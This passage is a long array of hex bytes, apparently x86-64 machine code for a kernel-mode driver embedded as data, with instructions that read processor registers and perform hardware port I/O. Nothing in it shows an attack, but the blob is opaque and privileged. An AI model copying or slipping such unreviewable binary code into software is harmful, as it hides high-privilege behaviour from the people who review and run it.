0x66, 0x0F, 0x2F, 0x05, 0x00, 0x19, 0x00, 0x00, 0x76, 0x16, 0x66, 0x0F, 0x28, 0xC2, 0xF2, 0x0F, 0x59, 0x05, 0xC2, 0x18, 0x00, 0x00, 0xF2, 0x0F, 0x5E, 0xC1, 0xF2, 0x0F, 0x5A, 0xD8, 0xEB, 0x03, 0x0F, 0x57, 0xDB, 0xF3, 0x48, 0x0F, 0x2C, 0xC3, 0x41, 0x89, 0x45, 0x00, 0xF2, 0x48, 0x0F, 0x2C, 0xC2, 0x41, 0x89, 0x45, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xC3, 0x09, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0xFF, 0x01, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x08, 0x0F, 0x82, 0xF5, 0x01, 0x00, 0x00, 0x44, 0x89, 0xBC, 0x24, 0xB4, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x00, 0x89, 0x84, 0x24, 0xB0, 0x01, 0x00, 0x00, 0x45, 0x33, 0xC0, 0xBA, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0xB0, 0x01, 0x00, 0x00, 0xFF, 0x15, 0xE7, 0x17, 0x00, 0x00, 0x4C, 0x8B, 0xD8, 0x45, 0x8B, 0x4D, 0x04, 0x44, 0x89, 0x8C, 0x24, 0xA4, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xC9, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x4C, 0x8B, 0xC0, 0x48, 0x89, 0x84, 0x24, 0x30, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x8B, 0xF4, 0x00, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xD2, 0xF2, 0x48, 0x0F, 0x2A, 0xD1, 0xF2, 0x0F, 0x10, 0x1D, 0x01, 0x18, 0x00, 0x00, 0xF2, 0x0F, 0x59, 0xD3, 0x41, 0x8B, 0x8B, 0xF0, 0x00, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xC0, 0xF2, 0x48, 0x0F, 0x2A, 0xC1, 0xF2, 0x0F, 0x58, 0xD0, 0xF2, 0x0F, 0x11, 0x94, 0x24, 0x28, 0x02, 0x00, 0x00, 0xBF, 0x50, 0xC3, 0x00, 0x00, 0x89, 0xBC, 0x24, 0x40, 0x01, 0x00, 0x00, 0xF2, 0x0F, 0x10, 0x25, 0xC4, 0x17, 0x00, 0x00, 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xC9, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x49, 0x3B, 0xC0, 0x73, 0x45, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x4C, 0x8B, 0xC0, 0x48, 0x89, 0x84, 0x24, 0x30, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x83, 0xF4, 0x00, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xD2, 0xF2, 0x48, 0x0F, 0x2A, 0xD0, 0xF2, 0x0F, 0x59, 0xD3, 0x41, 0x8B, 0x83, 0xF0, 0x00, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xC0, 0xF2, 0x48, 0x0F, 0x2A, 0xC0, 0xF2, 0x0F, 0x58, 0xD0, 0xF2, 0x0F, 0x11, 0x94, 0x24, 0x28, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x83, 0xF4, 0x00, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xC9, 0xF2, 0x48, 0x0F, 0x2A, 0xC8, 0xF2, 0x0F, 0x59, 0xCB, 0x41, 0x8B, 0x83, 0xF0, 0x00, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xC0, 0xF2, 0x48, 0x0F, 0x2A, 0xC0, 0xF2, 0x0F, 0x58, 0xC8, 0x83, 0xEF, 0x01, 0x89, 0xBC, 0x24, 0x40, 0x01, 0x00, 0x00, 0x78, 0x0E, 0xF2, 0x0F, 0x5C, 0xCA, 0x66, 0x0F, 0x2F, 0xE1, 0x0F, 0x87, 0x68, 0xFF, 0xFF, 0xFF, 0x41, 0x8B, 0xC9, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x41, 0x8B, 0x8B, 0xF4, 0x00, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xC9, 0xF2, 0x48, 0x0F, 0x2A, 0xC9, 0xF2, 0x0F, 0x59, 0xCB, 0x41, 0x8B, 0x8B, 0xF0, 0x00, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xC0, 0xF2, 0x48, 0x0F, 0x2A, 0xC1, 0xF2, 0x0F, 0x58, 0xC8, 0xF2, 0x0F, 0x5C, 0xCA, 0x66, 0x0F, 0xEF, 0xC0, 0xF2, 0x48, 0x0F, 0x2A, 0xC0, 0x79, 0x0E, 0xF2, 0x0F, 0x10, 0x15, 0x05, 0x17, 0x00, 0x00, 0xF2, 0x0F, 0x58, 0xC2, 0xEB, 0x08, 0xF2, 0x0F, 0x10, 0x15, 0xF7, 0x16, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xDB, 0xF2, 0x49, 0x0F, 0x2A, 0xD8, 0x4D, 0x85, 0xC0, 0x79, 0x04, 0xF2, 0x0F, 0x58, 0xDA, 0xF2, 0x0F, 0x5C, 0xC3, 0xF2, 0x0F, 0x59, 0x05, 0xA1, 0x16, 0x00, 0x00, 0xF2, 0x0F, 0x5E, 0xC1, 0xF2, 0x48, 0x0F, 0x2C, 0xD8, 0xBA, 0x00, 0x02, 0x00, 0x00, 0x49, 0x8B, 0xCB, 0xFF, 0x15, 0xC2, 0x15, 0x00, 0x00, 0x41, 0x89, 0x7D, 0x00, 0x41, 0x89, 0x5D, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xBA, 0x07, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xA9, 0x07, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0xCC, 0x00, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x04, 0x0F, 0x82, 0xC2, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x75, 0x00, 0x89, 0xB4, 0x24, 0xA4, 0x00, 0x00, 0x00, 0x8B, 0xCE, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x4C, 0x8B, 0xE0, 0x48, 0x8D, 0x8C, 0x24, 0xC0, 0x01, 0x00, 0x00, 0xFF, 0x15, 0x1F, 0x15, 0x00, 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x8B, 0x8C, 0x24, 0xC0, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x14, 0x89, 0x48, 0xB8, 0xCF, 0xF7, 0x53, 0xE3, 0xA5, 0x9B, 0xC4, 0x20, 0x48, 0xF7, 0xEA, 0x48, 0x8B, 0xDA, 0x48, 0xC1, 0xFB, 0x07, 0x48, 0x8B, 0xD3, 0x48, 0xC1, 0xEA, 0x3F, 0x48, 0x03, 0xDA, 0x33, 0xC9, 0xFF, 0x15, 0xEA, 0x14, 0x00, 0x00, 0x48, 0x2B, 0xC7, 0x48, 0x3B, 0xC3, 0x7C, 0xF0, 0x8B, 0xCE, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x48, 0x8B, 0xD8, 0x33, 0xC9, 0xFF, 0x15, 0xCC, 0x14, 0x00, 0x00, 0x4C, 0x8B, 0xD8, 0x49, 0x2B, 0xDC, 0x48, 0x0F, 0xAF, 0x9C, 0x24, 0xC0, 0x01, 0x00, 0x00, 0x4C, 0x2B, 0xDF, 0x33, 0xD2, 0x48, 0x8B, 0xC3, 0x49, 0xF7, 0xF3, 0x48, 0x8B, 0xC8, 0x48, 0xC1, 0xE9, 0x20, 0x41, 0x89, 0x4D, 0x00, 0x41, 0x89, 0x45, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xD3, 0x06, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xC2, 0x06, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0xC2, 0x03, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x2C, 0x0F, 0x82, 0xB8, 0x03, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x4C, 0x8D, 0x84, 0x24, 0xB4, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x94, 0x24, 0xAC, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0x08, 0x01, 0x00, 0x00, 0xFF, 0x15, 0xA6, 0x14, 0x00, 0x00, 0x41, 0x8B, 0x4D, 0x04, 0x48, 0xC1, 0xE1, 0x20, 0x41, 0x8B, 0x45, 0x00, 0x48, 0x03, 0xC8, 0x48, 0x89, 0x8C, 0x24, 0x68, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x55, 0x0C, 0x48, 0xC1, 0xE2, 0x20, 0x41, 0x8B, 0x45, 0x08, 0x48, 0x03, 0xD0, 0x48, 0x89, 0x94, 0x24, 0x78, 0x01, 0x00, 0x00, 0x45, 0x8B, 0x7D, 0x10, 0xB8, 0x03, 0x00, 0x00, 0x00, 0x44, 0x3B, 0xF8, 0x44, 0x0F, 0x47, 0xF8, 0x41, 0x8B, 0x45, 0x14, 0x89, 0x84, 0x24, 0x30, 0x03, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x18, 0x89, 0x84, 0x24, 0x40, 0x03, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x1C, 0x89, 0x84, 0x24, 0x48, 0x03, 0x00, 0x00, 0x45, 0x8B, 0x65, 0x20, 0x49, 0xC1, 0xE4, 0x20, 0x41, 0x8B, 0x45, 0x24, 0x4C, 0x03, 0xE0, 0x4C, 0x89, 0xA4, 0x24, 0x00, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x28, 0x89, 0x44, 0x24, 0x78, 0x48, 0x85, 0xD2, 0x0F, 0x84, 0xE2, 0x02, 0x00, 0x00, 0x4C, 0x8B, 0x52, 0x10, 0x4D, 0x85, 0xD2, 0x0F, 0x84, 0xD5, 0x02, 0x00, 0x00, 0x48, 0x8B, 0x49, 0x40, 0x4C, 0x8D, 0x49, 0x08, 0x4C, 0x89, 0x8C, 0x24, 0xD0, 0x01, 0x00, 0x00, 0x8B, 0x94, 0x24, 0x08, 0x01, 0x00, 0x00, 0x83, 0xFA, 0x06, 0x75, 0x0E, 0x8B, 0x84, 0x24, 0xAC, 0x00, 0x00, 0x00, 0x83, 0xF8, 0x04, 0x74, 0x12, 0xEB, 0x07, 0x8B, 0x84, 0x24, 0xAC, 0x00, 0x00, 0x00, 0x83, 0xFA, 0x0A, 0x75, 0x2B, 0x85, 0xC0, 0x75, 0x27, 0x44, 0x8B, 0x84, 0x24, 0xB4, 0x00, 0x00, 0x00, 0x41, 0x81, 0xF8, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x1E, 0x4C, 0x8D, 0x49, 0x10, 0x4C, 0x89, 0x8C, 0x24, 0xD0, 0x01, 0x00, 0x00, 0x4C, 0x89, 0x8C, 0x24, 0xD0, 0x01, 0x00, 0x00, 0xEB, 0x08, 0x44, 0x8B, 0x84, 0x24, 0xB4, 0x00, 0x00, 0x00, 0x33, 0xDB, 0x48, 0x89, 0x5C, 0x24, 0x50, 0x83, 0xFA, 0x06, 0x73, 0x11, 0x48, 0x8D, 0x99, 0xE8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x50, 0xE9, 0x94, 0x00, 0x00, 0x00, 0x83, 0xFA, 0x06, 0x75, 0x63, 0x83, 0xF8, 0x02, 0x73, 0x0E, 0x48, 0x8D, 0x99, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x50, 0xEB, 0x7C, 0x83, 0xF8, 0x02, 0x75, 0x0E, 0x48, 0x8D, 0x99, 0xA0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x50, 0xEB, 0x69, 0x83, 0xF8, 0x03, 0x75, 0x0E, 0x48, 0x8D, 0x99, 0xB0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x50, 0xEB, 0x56, 0x83, 0xF8, 0x04, 0x75, 0x51, 0x41, 0x81, 0xF8, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x0E, 0x48, 0x8D, 0x99, 0xC8, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x50, 0xEB, 0x3A, 0x48, 0x8D, 0x99, 0xC0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x50, 0xEB, 0x2C, 0x83, 0xFA, 0x0A, 0x75, 0x27, 0x85, 0xC0, 0x75, 0x23, 0x41, 0x81, 0xF8, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x0E, 0x48, 0x8D, 0x99, 0xC8, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x50, 0xEB, 0x0C, 0x48, 0x8D, 0x99, 0xC0, 0x02, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x50, 0x48, 0x85, 0xDB, 0x0F, 0x84, 0xA3, 0x01, 0x00, 0x00, 0x49, 0x81, 0x39, 0x50, 0x47, 0x53, 0x5F, 0x0F, 0x85, 0x96, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x0B, 0x48, 0x89, 0x8C, 0x24, 0x58, 0x01, 0x00, 0x00, 0x83, 0xFA, 0x06, 0x75, 0x0E, 0x83, 0xF8, 0x03, 0x75, 0x09, 0x49, 0x8D, 0x42, 0x70, 0x48, 0x89, 0x03, 0xEB, 0x31, 0x83, 0xFA, 0x06, 0x75, 0x05, 0x83, 0xF8, 0x04, 0x74, 0x09, 0x83, 0xFA, 0x0A, 0x75, 0x1F, 0x85, 0xC0, 0x75, 0x1B, 0x41, 0x81, 0xF8, 0xBB, 0x37, 0x00, 0x00, 0x72, 0x09, 0x49, 0x8D, 0x42, 0x78, 0x48, 0x89, 0x03, 0xEB, 0x0C, 0x49, 0x8D, 0x42, 0x70, 0x48, 0x89, 0x03, 0xEB, 0x03, 0x4C, 0x89, 0x13, 0x41, 0x8B, 0xF7, 0x48, 0xC1, 0xE6, 0x03, 0x8D, 0x46, 0x19, 0x89, 0x44, 0x24, 0x64, 0x48, 0x89, 0x84, 0x24, 0x88, 0x01, 0x00, 0x00, 0x41, 0xB8, 0x50, 0x57, 0x4D, 0x45, 0x48, 0x8B, 0xD0, 0x33, 0xC9, 0xFF, 0x15, 0xBC, 0x12, 0x00, 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x85, 0xC0, 0x0F, 0x84, 0x05, 0x01, 0x00, 0x00, 0x4C, 0x8B, 0x84, 0x24, 0x88, 0x01, 0x00, 0x00, 0x33, 0xD2, 0x48, 0x8B, 0xC8, 0xE8, 0x0E, 0x0A, 0x00, 0x00, 0xC7, 0x07, 0x41, 0x65, 0x69, 0x43, 0x48, 0x8B, 0x8C, 0x24, 0x78, 0x01, 0x00, 0x00, 0xE8, 0xCB, 0xD1, 0xFF, 0xFF, 0x89, 0x47, 0x04, 0x89, 0x77, 0x08, 0x44, 0x89, 0x7F, 0x0C, 0x33, 0xC9, 0x66, 0x89, 0x4F, 0x10, 0xBE, 0x04, 0x00, 0x00, 0x00, 0x66, 0x89, 0x77, 0x12, 0x8B, 0x84, 0x24, 0x30, 0x03, 0x00, 0x00, 0x89, 0x47, 0x14, 0x41, 0x83, 0xFF, 0x01, 0x76, 0x12, 0x66, 0x89, 0x4F, 0x18, 0x66, 0x89, 0x77, 0x1A, 0x8B, 0x84, 0x24, 0x40, 0x03, 0x00, 0x00, 0x89, 0x47, 0x1C, 0x41, 0x83, 0xFF, 0x02, 0x76, 0x12, 0x66, 0x89, 0x4F, 0x20, 0x66, 0x89, 0x77, 0x22, 0x8B, 0x84, 0x24, 0x48, 0x03, 0x00, 0x00, 0x89, 0x47, 0x24, 0x41, 0x89, 0x0C, 0x24, 0xC7, 0x44, 0x24, 0x28, 0x14, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x64, 0x24, 0x20, 0x44, 0x8B, 0x7C, 0x24, 0x64, 0x45, 0x8B, 0xCF, 0x4C, 0x8B, 0xC7, 0xBA, 0x04, 0xC0, 0x32, 0x00, 0x48, 0x8B, 0xB4, 0x24, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8B, 0xCE, 0xE8, 0xB7, 0xD3, 0xFF, 0xFF, 0x89, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x3D, 0x05, 0x00, 0x00, 0x80, 0x75, 0x2E, 0x41, 0x8B, 0x4C, 0x24, 0x04, 0x3B, 0x4C, 0x24, 0x78, 0x73, 0x23, 0x89, 0x4C, 0x24, 0x28, 0x4C, 0x89, 0x64, 0x24, 0x20, 0x45, 0x8B, 0xCF, 0x4C, 0x8B, 0xC7, 0xBA, 0x04, 0xC0, 0x32, 0x00, 0x48, 0x8B, 0xCE, 0xE8, 0x82, 0xD3, 0xFF, 0xFF, 0x89, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x41, 0x89, 0x45, 0x00, 0x45, 0x89, 0x65, 0x04, 0x33, 0xD2, 0x48, 0x8B, 0xCF, 0xFF, 0x15, 0x98, 0x11, 0x00, 0x00, 0x4C, 0x8B, 0x9C, 0x24, 0x58, 0x01, 0x00, 0x00, 0x4C, 0x89, 0x1B, 0xEB, 0x2B, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0x75, 0x04, 0x41, 0x89, 0x75, 0x00, 0xEB, 0x1C, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0x75, 0x04, 0x41, 0x89, 0x75, 0x00, 0xEB, 0x0D, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0x75, 0x04, 0x41, 0x89, 0x75, 0x00, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x33, 0xC0, 0x41, 0x89, 0x46, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xF6, 0x02, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xE5, 0x02, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0x60, 0x02, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x14, 0x0F, 0x82, 0x56, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x00, 0x89, 0x84, 0x24, 0xE4, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x04, 0x89, 0x84, 0x24, 0xE0, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x08, 0x89, 0x84, 0x24, 0x80, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x0C, 0x8B, 0xF8, 0xC1, 0xEF, 0x10, 0x89, 0x7C, 0x24, 0x40, 0x0F, 0xB7, 0xD8, 0x89, 0x9C, 0x24, 0x0C, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x10, 0x89, 0x84, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x45, 0x8B, 0xE7, 0x85, 0xFF, 0x41, 0x0F, 0x94, 0xC4, 0x44, 0x89, 0xA4, 0x24, 0xBC, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC0, 0x41, 0x8D, 0x50, 0x20, 0x48, 0x8B, 0x8C, 0x24, 0xE0, 0x01, 0x00, 0x00, 0xFF, 0x15, 0xC9, 0x10, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0x18, 0x02, 0x00, 0x00, 0x48, 0x83, 0xC0, 0x10, 0x48, 0x89, 0x84, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x41, 0xB9, 0x01, 0x00, 0x00, 0x00, 0x44, 0x89, 0x4C, 0x24, 0x70, 0x85, 0xDB, 0x0F, 0x84, 0xA4, 0x00, 0x00, 0x00, 0xBE, 0xE8, 0x03, 0x00, 0x00, 0x0F, 0xB7, 0x5C, 0x24, 0x34, 0x45, 0x85, 0xE4, 0x75, 0x13, 0x41, 0x2B, 0xF9, 0x89, 0x7C, 0x24, 0x40, 0x79, 0x0A, 0x44, 0x89, 0x7C, 0x24, 0x70, 0xE9, 0x62, 0x01, 0x00, 0x00, 0x0F, 0xB7, 0x00, 0x66, 0x89, 0x84, 0x24, 0x30, 0x03, 0x00, 0x00, 0x0F, 0xB7, 0xD0, 0x66, 0x83, 0xCA, 0x04, 0x66, 0xD1, 0xFA, 0x48, 0x8B, 0x8C, 0x24, 0xC0, 0x00, 0x00, 0x00, 0xF0, 0x66, 0x0F, 0xB1, 0x11, 0x66, 0x8B, 0xD8, 0x66, 0x89, 0x44, 0x24, 0x34, 0x41, 0x8B, 0xD7, 0x89, 0x94, 0x24, 0x60, 0x01, 0x00, 0x00, 0x41, 0x8B, 0xCF, 0x89, 0x8C, 0x24, 0x10, 0x01, 0x00, 0x00, 0x3B, 0xCE, 0x73, 0x14, 0xFF, 0xC2, 0x89, 0x94, 0x24, 0x60, 0x01, 0x00, 0x00, 0xFF, 0xC1, 0x89, 0x8C, 0x24, 0x10, 0x01, 0x00, 0x00, 0xEB, 0xE8, 0x66, 0x3B, 0x9C, 0x24, 0x30, 0x03, 0x00, 0x00, 0x75, 0x09, 0xF6, 0xC3, 0x02, 0x0F, 0x84, 0xF9, 0x00, 0x00, 0x00, 0x8B, 0x7C, 0x24, 0x40, 0x44, 0x8B, 0xA4, 0x24, 0xBC, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0xC0, 0x00, 0x00, 0x00, 0xE9, 0x66, 0xFF, 0xFF, 0xFF, 0xBE, 0xE8, 0x03, 0x00, 0x00, 0x66, 0x8B, 0x5C, 0x24, 0x34, 0x45, 0x85, 0xE4, 0x75, 0x13, 0x41, 0x2B, 0xF9, 0x89, 0x7C, 0x24, 0x40, 0x79, 0x0A, 0x44, 0x89, 0x7C, 0x24, 0x70, 0xE9, 0x76, 0x00, 0x00, 0x00, 0x0F, 0xB7, 0x00, 0x66, 0x89, 0x84, 0x24, 0x30, 0x03, 0x00, 0x00, 0x0F, 0xB7, 0xD0, 0x66, 0x83, 0xE2, 0xFC, 0x48, 0x8B, 0x8C, 0x24, 0xC0, 0x00, 0x00, 0x00, 0xF0, 0x66, 0x0F, 0xB1, 0x11, 0x66, 0x8B, 0xD8, 0x66, 0x89, 0x44, 0x24, 0x34, 0x41, 0x8B, 0xCF, 0x89, 0x8C, 0x24, 0x48, 0x01, 0x00, 0x00, 0x41, 0x8B, 0xC7, 0x89, 0x84, 0x24, 0xD8, 0x00, 0x00, 0x00, 0x3B, 0xC6, 0x73, 0x14, 0xFF, 0xC1, 0x89, 0x8C, 0x24, 0x48, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24, 0xD8, 0x00, 0x00, 0x00, 0xEB, 0xE8, 0x66, 0x3B, 0x9C, 0x24, 0x30, 0x03, 0x00, 0x00, 0x74, 0x19, 0x8B, 0x7C, 0x24, 0x40, 0x44, 0x8B, 0xA4, 0x24, 0xBC, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0xC0, 0x00, 0x00, 0x00, 0xE9, 0x72, 0xFF, 0xFF, 0xFF, 0x41, 0x84, 0xD9, 0x74, 0x43, 0x81, 0xBC, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x86, 0x80, 0x00, 0x00, 0x75, 0x18, 0x8B, 0x8C, 0x24, 0x80, 0x01, 0x00, 0x00, 0x85, 0xC9, 0x74, 0x2B, 0x66, 0x83, 0xC1, 0x30, 0x0F, 0xB7, 0xD1, 0xEC, 0x0C, 0x80, 0xEE, 0xEB, 0x1E, 0x81, 0xBC, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x22, 0x10, 0x00, 0x00, 0x75, 0x11, 0xBA, 0xD6, 0x0C, 0x00, 0x00, 0xB0, 0x74, 0xEE, 0xBA, 0xD7, 0x0C, 0x00, 0x00, 0xEC, 0x0C, 0x80, 0xEE, 0xBA, 0x20, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0x18, 0x02, 0x00, 0x00, 0xFF, 0x15, 0x8B, 0x0E, 0x00, 0x00, 0x44, 0x8B, 0x5C, 0x24, 0x70, 0x45, 0x89, 0x5D, 0x00, 0x0F, 0xBF, 0xC3, 0x41, 0x89, 0x45, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x7B, 0x00, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xEB, 0x6D, 0x83, 0x7A, 0x08, 0x0C, 0x73, 0x0E, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xEB, 0x59, 0x45, 0x33, 0xC9, 0x4C, 0x8D, 0x84, 0x24, 0xEC, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x94, 0x24, 0xE8, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0x20, 0x01, 0x00, 0x00, 0xFF, 0x15, 0x51, 0x0E, 0x00, 0x00, 0x44, 0x8B, 0x9C, 0x24, 0x20, 0x01, 0x00, 0x00, 0x45, 0x89, 0x5D, 0x00, 0x8B, 0x84, 0x24, 0xE8, 0x00, 0x00, 0x00, 0x41, 0x89, 0x45, 0x04, 0x8B, 0x84, 0x24, 0xEC, 0x00, 0x00, 0x00, 0x41, 0x89, 0x45, 0x08, 0x49, 0xC7, 0x46, 0x38, 0x0C, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x08, 0x41, 0xC7, 0x46, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0x41, 0x8B, 0x5E, 0x30, 0x33, 0xD2, 0x49, 0x8B, 0xCE, 0xFF, 0x15, 0xFA, 0x0D, 0x00, 0x00, 0x8B, 0xC3, 0x4C, 0x8D, 0x9C, 0x24, 0xF0, 0x02, 0x00, 0x00, 0x41, 0x0F, 0x28, 0x73, 0xF0, 0x41, 0x0F, 0x28, 0x7B, 0xE0, 0x45, 0x0F, 0x28, 0x43, 0xD0, 0x49, 0x8B, 0xE3, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5F, 0x5E, 0x5B, 0xC3, 0x66, 0x90, 0x40, 0x16, 0x00, 0x00, 0xFA, 0x16, 0x00, 0x00, 0xBE, 0x17, 0x00, 0x00, 0x3C, 0x17, 0x00, 0x00, 0x05, 0x18, 0x00, 0x00, 0x7F, 0x17, 0x00, 0x00, 0x4D, 0x18, 0x00, 0x00, 0x94, 0x18, 0x00, 0x00, 0x97, 0x16, 0x00, 0x00, 0x35, 0x1C, 0x00, 0x00, 0x03, 0x1D, 0x00, 0x00, 0xA1, 0x19, 0x00, 0x00, 0xD8, 0x29, 0x00, 0x00, 0x8E, 0x1D, 0x00, 0x00, 0x32, 0x21, 0x00, 0x00, 0xB5, 0x21, 0x00, 0x00, 0x38, 0x22, 0x00, 0x00, 0xA3, 0x25, 0x00, 0x00, 0xF4, 0x26, 0x00, 0x00, 0x58, 0x1A, 0x00, 0x00, 0x46, 0x1B, 0x00, 0x00, 0xEB, 0x1F, 0x00, 0x00, 0x09, 0x2A, 0x00, 0x00, 0xB7, 0x2B, 0x00, 0x00, 0x80, 0x2E, 0x00, 0x00, 0x5F, 0x42, 0x00, 0x00, 0x00, 0x19, 0x19, 0x19, 0x01, 0x19, 0x19, 0x19, 0x02, 0x19, 0x19, 0x19, 0x03, 0x19, 0x19, 0x19, 0x04, 0x19, 0x19, 0x19, 0x05, 0x19, 0x19, 0x19, 0x06, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x07, 0x19, 0x19, 0x19, 0x08, 0x19, 0x19, 0x19, 0x09, 0x19, 0x19, 0x19, 0x0A, 0x19, 0x19, 0x19, 0x0B, 0x19, 0x19, 0x19, 0x19, 0x19, 